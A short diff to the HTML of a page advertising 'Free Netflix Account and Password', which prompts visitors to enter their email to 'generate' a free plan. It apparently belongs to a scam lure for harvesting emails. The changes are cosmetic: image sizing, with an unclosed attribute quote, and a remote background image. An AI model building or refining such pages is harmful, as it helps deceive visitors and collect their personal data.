--- a/index.html
+++ b/index.html
@@ -89,7 +89,7 @@ a:hover, a:active {
 }
 </style>
 <div>
-    <center><img src="slogo.png" alt="Free Netflix Account and Password"></center><br>
+    <center><img src="slogo.png" alt="Free Netflix Account and Password" style="width:500px;height:100px;></center><br>
 <b>Enter your Email to Generate Netflix Plan Free</b>
     <input type="text" id="name" name="firstname" placeholder="Email">
     <label for="country">Select the plan:</label>
@@ -125,7 +125,7 @@ function yes() {
 </div>
 	  <style>
 body {
-  background-image: url("bg.png");
+  background-image: url("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEp2KqpWOnMD6OG85WKDOy6Y2GGn7-hmj2SdTtlMSp0LquTz4rmTN3dsCV-T4PJz6PnjLLw_kkcyoSvUZHNvCcOqpGq7_OcIW57Ppwb_wx8dDKzcQcck8yFiHY2msTlatWM0eEeFg9bpck7BWn-d-IJrxgpxRcHiWEwORcuAGB99wYlz42bOrpNm0aOFE/s1600/bg.jpg");
 }
 p {
   color: #fff;
